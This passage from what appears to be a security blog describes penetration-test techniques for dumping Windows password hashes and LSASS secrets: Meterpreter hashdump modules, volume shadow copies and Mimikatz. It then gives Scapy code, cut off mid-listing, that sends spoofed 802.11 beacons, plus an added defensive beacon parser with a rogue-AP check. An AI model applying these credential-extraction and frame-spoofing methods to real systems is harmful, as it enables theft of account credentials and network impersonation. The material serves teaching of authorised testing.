<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">c)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Using each piece as a DES key to encrypt the server
challenge.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">NTLMv2 challenge/response is significantly more secure, and
operates as follows:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">1)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Workstation client initiates authentication<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">2)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Server responds with a random challenge<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">3)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Client formulates/sends a response by:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l3 level2 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">a)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Creating an HMAC-MD5 string over the username and domain
name, keyed with the NT hash.<span style="mso-spacerun: yes;"> </span>This result
is called the NTLMv2 one-way function (OWF)<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l3 level2 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">b)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Combining the HMAC-MD5 string, server challenge,
timestamp, and client challenge into a response. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">Obtaining
Hashes during a Penetration Test</span></b></h2>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In a post exploitation scenario, and assuming you have
administrative access, it is useful to be able to retrieve the hashed
representation of passwords. Windows hashed passwords are stored in the
Security Accounts Manager (SAM) registry hive which is a file named
“%SystemRoot%\System32\Config\SAM”.<span style="mso-spacerun: yes;"> </span>By
default, the SAM file is locked on a running system, and inaccessible to all
users including administrative users.<span style="mso-spacerun: yes;"> </span>If
an NT file system recovery was performed in the past, and the Administrator has
not removed the backup data, you might be able to find the SAM file in the
“%SystemRoot%\repair” directory.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">Since you cannot read the file directly on the disk volume,
there are a few alternative tricks to get hold of the data.<span style="mso-spacerun: yes;"> </span>The Local Security Authority Subsystem
process (LSASS.EXE) on a running Windows system reads this data and caches it
in memory.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 1: Meterpreter “hashdump” command </span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The hashdump command is an in-memory version of “pwdump”.<span style="mso-spacerun: yes;"> </span>Hashdump allocates memory inside the LSASS
process, injects assembly code, and executes it using the CreateThread()
function.<span style="mso-spacerun: yes;"> </span>The injected assembly code is
designed to read the hashes out of LSASS memory, and print them out.<span style="mso-spacerun: yes;"> </span>No files are written to disk, thus detecting
the technique without using memory forensic techniques is difficult.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In January, 2010, HD Moore noted that Anti-Virus, and host
intrusion prevention (HIPS) vendors had developed techniques to detect the API
calls made by the meterpreter hashdump command, and block the calls.<span style="mso-spacerun: yes;"> </span>In the process of detection however, LSASS
will often crash leading to system instability.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 2: Meterpreter “hashdump” post module</span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The hashdump post module (post/windows/gather/hashdump.rb) uses
a registry based technique to directly access the SYSKEY, and decrypt the raw
LANMAN, and NT hashes.<span style="mso-tab-count: 1;"> </span>The
significant advantage of this technique is that there is no in-memory
manipulation of LSASS with its potential for instability.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The caveat is that a SYSTEM token is required to use the
technique.<span style="mso-spacerun: yes;"> </span>An account in the local
administrators group does not have read access to the SAM registry tree that
contains the hashes.<span style="mso-spacerun: yes;"> </span>If you have
exploited a system service, or perhaps something like a DCERPC vulnerability,
you are in great shape.<span style="mso-spacerun: yes;"> </span>Alternatively
you can consider migrating your meterpreter to a service process, or load the
incognito module, and impersonate a token.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 3: Meterpreter “smart_hashdump” post
module</span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">Carlos Perez improved further on these hash extraction techniques
by automating some of the additional steps and logic required
before the actual hashes are extracted.<span style="mso-spacerun: yes;">
</span>The “smart_hashdump” post module works as follows:</span><br />
<span style="font-family: Verdana, sans-serif;">
</span><br />
<ul>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Determine the
privilege level, operating system, and test if the target is a domain
controller</span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; line-height: 136%; text-indent: -17.95pt;"><span style="font-size: 7pt; line-height: normal;"> </span></span><span style="background: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If you have the
right privileges, specifically a SYSTEM token, smart_hashdump will read the
hashes from the SAM registry hive.</span></span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If the system is a
Domain Controller, smart_hashdump will always inject assembly code into LSASS
to obtain hashes.</span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 2008 server, and the process has administrative privileges,
smart_hashdump will:</span></li>
<ul>
<li><span style="background: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Attempt to gain
SYSTEM by using “getsystem”.</span></li>
<li><span style="background: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If it fails to get
system, smart_hashdump will attempt to automatically migrate to a process that
has system privileges.</span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Inject the LSASS
process with assembly code to dump the hashes</span></li>
</ul>
<li><span style="font-family: Verdana, sans-serif;"><span style="background-color: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 7+ system with UAC disabled and the process has administrative
privileges, smart_hashdump will run “getsystem” and use the registry reading
method.</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="background-color: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 2000/2003/XP system, “getsystem” will be used followed by the registry
reading method.</span></span></li>
</ul>
</div>
<div class="normalCxSpMiddle" style="line-height: 136%; margin-bottom: 8.0pt; margin-left: 55.0pt; margin-right: 0in; margin-top: 0in; mso-add-space: auto; mso-list: l5 level1 lfo2; text-indent: -17.95pt;">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;">The take home point
with “smart_hashdump” is that it will do the work for you to obtain SYSTEM
privilege and prefer reading the SAM registry hive if at all possible.<span style="mso-spacerun: yes;"> </span>The downside with this and all methods, is
that within the context of a Domain Controller, you are still required to
inject assembly code into LSASS in order to obtain hashes.<span style="mso-spacerun: yes;"> </span>As pointed out above, this is a dangerous
technique and can result in a crash which your client would certainly not
appreciate.</span></div>
<h3 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;">
Method 4: Extract hashes from Volume Shadow Copies of the file system</span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In 2011, Tim Tomes and Mark Baggett were performing research
on the topic of hiding malware in Volume Shadow Copies.<span style="mso-spacerun: yes;"> </span>As a result of this work, they realized that
by creating a volume shadow copy, or using a pre-existing one,
the NTDS.DIT, SAM and SYSTEM files could be copied directly from a running
system.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In summary, the process involves:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Creating a volume shadow copy using the system tool
“vssadmin” or Tim’s Visual Basic script called “Vssown.vbs”<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Downloading the NTDS.DIT, SAM, and SYSTEM files<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Downloading and compiling tools from <a href="http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip"><span style="background: white; color: #41a0d6; mso-highlight: white; text-decoration: none; text-underline: none;">http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip</span></a><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Using <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span style="background: white; color: #333333; mso-highlight: white;">esedbdumphash</span></i></b><span style="background: white; color: #333333; mso-highlight: white;"> to extract the database from NTDS.DIT</span><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="background: white; color: #333333; mso-highlight: white;">Using <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">dsdump.py</i></b>, or <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">bkhive2</i></b>, and <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">samdump2</i></b>
to dump hashes.<o:p></o:p></span></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;">The
largest single advantage with using an offline method to extract hashes after
copying from a volume shadow is the fact that you do not have to inject
anything into the LSASS process on a running domain controller.<span style="mso-spacerun: yes;"> </span>The disadvantage is that in a larger
environment, you are faced with exfiltrating some potentially large files, and
downloading them for analysis.<span style="mso-spacerun: yes;"> </span>It is
possible that network defenders might detect the network activity of a large
data transfer, and/or a large file being written to disk on a workstation.</span><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h2>
<span style="font-family: Verdana, sans-serif; font-size: large;">Choosing the right tool for the job</span></h2>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;">
Which method of hash extraction you decide to use depends on the context of
your test.<span style="mso-spacerun: yes;"> </span>If you are dealing with an
individual system that is not a domain controller, then the “smart_hashdump”
module is a good solid choice.<span style="mso-spacerun: yes;"> </span>If you
are working with host based IPS or Anti-Virus that is detecting LSASS injection
attempts, you are taking a significant risk when injecting assembly into this
process.<span style="mso-spacerun: yes;"> </span>In the context of a domain
controller, a volume shadow copy extraction is the best approach to ensure
stability.<span style="mso-spacerun: yes;"> </span>It is apparent that the
original LSASS injection process in meterpreter can be risky, and should
probably be avoided.</span><o:p></o:p></span></div>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;">While this article
focuses on hashes, it would be remiss not to mention that LSASS also caches
some plaintext data for other security service providers.<span style="mso-spacerun: yes;"> </span>These include WDigest for HTTP
authentication, Kerberos, and Terminal Services.<span style="mso-spacerun: yes;"> </span>If you have administrative access on a local
system, LSASS plaintext security service provider memory can be accessed using
the Mimikatz or Kiwi extensions enabling the extraction of plaintext
information to screen.<span style="mso-spacerun: yes;"> </span>Kiwi can be
thought of as the upgraded (version 2) release of Mimikatz and includes some
excellent new functionality.</span><br />
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;"><br /></span></div>
<h2 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif; font-size: large;">
References</span></h2>
<div class="normalCxSpFirst" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"><span style="color: #1155cc;">http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html</span></a><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://web.textfiles.com/hacking/sam_files.txt"><span style="color: #1155cc;">http://web.textfiles.com/hacking/sam_files.txt</span></a>
<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html"><span style="color: #1155cc;">http://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html</span></a>
<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping"><span style="color: #1155cc;">https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping</span></a>
<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h2>Sending 802.11 Packets with Scapy</h2>
Published 2014-01-16T11:17:00-08:00, updated 2014-01-16T11:21:58-08:00<br />
To accompany my recent technical segment on Paul Asadoorian's Security Weekly show, here is a functional Python example of sending 802.11 beacons, probe requests, ARP and DNS requests. Enjoy!<br />
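Added here as an example that is not part of the original post: a standard-library parser for the beacon frames that the Beacon() method in the listing below builds (802.11 management header, fixed parameters, then the SSID, Rates, DS Parameter Set and TIM elements), followed by the check a wireless IDS would run on a parsed beacon, flagging a known SSID advertised from an unknown BSSID or without the privacy bit. The sample frame, the allow-list and the rogue_ap_check() helper are constructed for the example, and the parser stops cleanly on a truncated element instead of trusting the declared length.<br />

```python
"""Parse 802.11 beacon frames and check them against an allow-list of APs.

Added example (not code from the original post): standard library only, so
it runs without Scapy or a wireless interface. SAMPLE_BEACON is a hand-built
frame with the layout Beacon() emits (without the RadioTap header).
"""
import struct

# Capability bits as transmitted (little-endian 16-bit field).
CAP_ESS = 0x0001
CAP_PRIVACY = 0x0010

# Information element IDs used by the post's Beacon() method.
IE_SSID, IE_RATES, IE_DSSET, IE_TIM = 0, 1, 3, 5

# Constructed sample: broadcast beacon for SSID "test" from the post's
# source/BSSID addresses, channel 6, privacy bit clear (an open network).
SAMPLE_BEACON = bytes.fromhex(
    "8000"                    # frame control: type 0 (management), subtype 8 (beacon)
    "0000"                    # duration
    "ffffffffffff"            # addr1: broadcast destination
    "0000deadbeef"            # addr2: transmitter address
    "001122334455"            # addr3: BSSID
    "0000"                    # sequence control
    "0000000000000000"        # timestamp
    "6400"                    # beacon interval: 100 TU
    "2104"                    # capabilities 0x0421: ESS, short preamble, short slot
    "000474657374"            # IE 0 SSID, length 4, "test"
    "010882848b960c121824"    # IE 1 Supported Rates: 1, 2, 5.5, 11 (basic), 6, 9, 12, 18
    "030106"                  # IE 3 DS Parameter Set: channel 6
    "050400010000"            # IE 5 TIM
)


def mac_str(raw):
    """Format six address bytes as colon-separated hex."""
    return ":".join("%02x" % b for b in raw)


def parse_ies(buf):
    """Split the tagged-parameter area into (id, payload) pairs.

    A declared length that overruns the frame ends parsing instead of
    raising, which is what a sniffer needs when it sees malformed frames.
    """
    ies, off = [], 0
    while off + 2 <= len(buf):
        ie_id, ie_len = buf[off], buf[off + 1]
        off += 2
        if off + ie_len > len(buf):
            break
        ies.append((ie_id, buf[off:off + ie_len]))
        off += ie_len
    return ies


def parse_beacon(frame):
    """Decode a beacon frame into a dict; return None for any other frame."""
    if len(frame) < 36:   # 24-byte MAC header + 12 bytes of fixed parameters
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 8:
        return None
    _timestamp, interval, cap = struct.unpack_from("<QHH", frame, 24)
    info = {
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "interval_tu": interval,
        "ess": bool(cap & CAP_ESS),
        "privacy": bool(cap & CAP_PRIVACY),
        "ssid": None, "channel": None,
        "rates_mbps": [], "basic_rates_mbps": [],
    }
    for ie_id, data in parse_ies(frame[36:]):
        if ie_id == IE_SSID:
            info["ssid"] = data.decode("utf-8", "replace")
        elif ie_id == IE_RATES:
            for b in data:          # units of 500 kbps; MSB marks a basic rate
                mbps = (b & 0x7F) / 2
                info["rates_mbps"].append(mbps)
                if b & 0x80:
                    info["basic_rates_mbps"].append(mbps)
        elif ie_id == IE_DSSET and len(data) == 1:
            info["channel"] = data[0]
    return info


def rogue_ap_check(info, known_aps):
    """Return findings for a parsed beacon against {ssid: set_of_bssids}.

    Flags a known SSID announced by a BSSID not on the list (a rogue or
    twin AP) and a known SSID announced as an open network.
    """
    findings = []
    ssid = info["ssid"]
    if ssid in known_aps:
        if info["bssid"] not in known_aps[ssid]:
            findings.append("SSID %r from unknown BSSID %s" % (ssid, info["bssid"]))
        if not info["privacy"]:
            findings.append("SSID %r advertised without privacy bit" % ssid)
    return findings


if __name__ == "__main__":
    parsed = parse_beacon(SAMPLE_BEACON)
    print(parsed)
    for finding in rogue_ap_check(parsed, {"test": {"00:11:22:33:44:55"}}):
        print("[!]", finding)
```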
<br />
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#!/usr/bin/env python</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">802.11 Scapy Packet Example</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Author: Joff Thyer, 2014</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># if we set logging to ERROR level, it supresses the warning message</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># from Scapy about ipv6 routing</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># WARNING: No route found for IPv6 destination :: (no default route?)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">import</span> logging</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">logging.getLogger(<span class="s2">"scapy.runtime"</span>).setLevel(logging.ERROR)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">from</span> scapy.<span class="s3">all</span> <span class="s1">import</span> *</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s4">class</span><span class="s5"> </span>Scapy80211<span class="s5">():</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s4">def </span><span class="s3">__init__</span><span class="s5">(self,intf=</span>'wlan0'<span class="s5">,ssid=</span>'test'<span class="s5">,\</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> source=</span>'00:00:de:ad:be:ef'<span class="s5">,\</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> bssid=</span>'00:11:22:33:44:55'<span class="s5">,srcip=</span>'10.10.10.10'<span class="s5">):</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="s5" style="font-size: x-small;"><br /></span></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> self.rates = </span><span class="s2">"</span>\x03\x12\x96\x18\x24\x30\x48\x60<span class="s2">"</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.ssid = ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.source = source</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.srcip = srcip</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.bssid = bssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.intf = intf</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.intfmon = intf + <span class="s2">'mon'</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span># set Scapy conf.iface</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> conf.iface = self.intfmon</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span># create monitor interface using iw</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> cmd = </span>'/sbin/iw dev %s interface add %s type monitor >/dev/null 2>&1'<span class="s5"> </span><span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> % (self.intf, self.intfmon)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> os.system(cmd)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">def</span> <span class="s3">Beacon</span>(self,count=<span class="s2">10</span>,ssid=<span class="s2">''</span>,dst=<span class="s2">'ff:ff:ff:ff:ff:ff'</span>):</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">if</span> <span class="s4">not</span> ssid: ssid=self.ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> beacon = Dot11Beacon(cap=<span class="s2">0x2104</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> essid = Dot11Elt(ID=<span class="s2">'SSID'</span>,info=ssid)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> rates = Dot11Elt(ID=<span class="s2">'Rates'</span>,info=self.rates)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dsset = Dot11Elt(ID=<span class="s2">'DSset'</span>,info=<span class="s2">'</span><span class="s1">\x01</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> tim = Dot11Elt(ID=<span class="s2">'TIM'</span>,info=<span class="s2">'</span><span class="s1">\x00\x01\x00\x00</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s3">type</span>=<span class="s2">0</span>,subtype=<span class="s2">8</span>,addr1=dst,addr2=self.source,addr3=self.bssid)<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /beacon/essid/rates/dsset/tim</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s3">print</span><span class="s5"> </span>'[*] 802.11 Beacon: SSID=[%s], count=%d'<span class="s5"> % (ssid,count)</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,iface=self.intfmon,count=count,inter=<span class="s2">0.1</span>,verbose=<span class="s2">0</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
